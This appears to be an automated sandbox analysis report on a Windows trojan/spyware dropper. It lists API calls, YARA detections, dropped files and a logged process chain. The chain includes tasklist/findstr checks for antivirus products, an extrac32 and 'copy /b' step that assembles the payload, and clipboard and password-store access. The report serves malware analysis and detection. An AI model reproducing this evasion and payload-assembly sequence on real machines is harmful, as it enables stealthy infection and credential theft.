Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_05781000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,		14_2_05781000

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00ADF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

14_2_00ADF55C

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 2_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

2_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00AF9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

14_2_00AF9FD2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.TNyOrM6mIM.exe.850000.0.unpack, type: UNPACKEDPE

Matched rule: Detects downloader / injector Author: ditekSHen

PE file contains section with special chars

Source: TNyOrM6mIM.exe	Static PE information: section name:
Source: TNyOrM6mIM.exe	Static PE information: section name: .idata
Source: TNyOrM6mIM.exe	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00AD4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

14_2_00AD4763

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00AC1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

14_2_00AC1B4D

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		2_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00ACF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		14_2_00ACF20D

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	File created: C:\Windows\UtilitySoccer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	File created: C:\Windows\MoveRefurbished	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	File created: C:\Windows\ClarkWriter	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_0040737E	2_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_00406EFE	2_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_004079A2	2_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 2_2_004049A8	2_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A88017	14_2_00A88017
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A6E1F0	14_2_00A6E1F0
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A7E144	14_2_00A7E144
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A822A2	14_2_00A822A2
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A622AD	14_2_00A622AD
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A9A26E	14_2_00A9A26E
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A7C624	14_2_00A7C624
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00AEC8A4	14_2_00AEC8A4
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A9E87F	14_2_00A9E87F
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A96ADE	14_2_00A96ADE
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00AD2A05	14_2_00AD2A05
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00AC8BFF	14_2_00AC8BFF
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A7CD7A	14_2_00A7CD7A
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A8CE10	14_2_00A8CE10
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A97159	14_2_00A97159
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A69240	14_2_00A69240
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00AF5311	14_2_00AF5311
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A696E0	14_2_00A696E0
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A81704	14_2_00A81704
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A81A76	14_2_00A81A76
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A87B8B	14_2_00A87B8B
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A69B60	14_2_00A69B60
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A87DBA	14_2_00A87DBA
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A81D20	14_2_00A81D20
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00A81FE7	14_2_00A81FE7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\768400\Climb.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: String function: 00A7FD52 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: String function: 00A80DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: String function: 004062CF appears 57 times

Source: TNyOrM6mIM.exe, 00000000.00000002.2382843415.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameladdad.exe4 vs TNyOrM6mIM.exe
Source: TNyOrM6mIM.exe, 00000000.00000002.2385873971.0000000005780000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameladdad.exe4 vs TNyOrM6mIM.exe
Source: TNyOrM6mIM.exe	Binary or memory string: OriginalFilenameladdad.exe4 vs TNyOrM6mIM.exe

Source: TNyOrM6mIM.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.TNyOrM6mIM.exe.850000.0.unpack, type: UNPACKEDPE

Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector

Source: TNyOrM6mIM.exe

Static PE information: Section: fsurptkt ZLIB complexity 0.9944674079182821

Source: Set-up.exe.0.dr

Binary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@28/22@10/3

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00AD41FA GetLastError,FormatMessageW,

14_2_00AD41FA

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00AC2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		14_2_00AC2010
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 14_2_00AC1A0B AdjustTokenPrivileges,CloseHandle,		14_2_00AC1A0B

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

2_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00ACDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

14_2_00ACDD87

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 2_2_004024FB CoCreateInstance,

2_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 14_2_00AD3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

14_2_00AD3A0E

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe

File created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Climb.com, 0000000E.00000003.2620355728.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2620497873.0000000003A40000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: TNyOrM6mIM.exe

ReversingLabs: Detection: 65%

Source: TNyOrM6mIM.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: TNyOrM6mIM.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\TNyOrM6mIM.exe "C:\Users\user\Desktop\TNyOrM6mIM.exe"
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe"
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Reflect
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Reflect	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
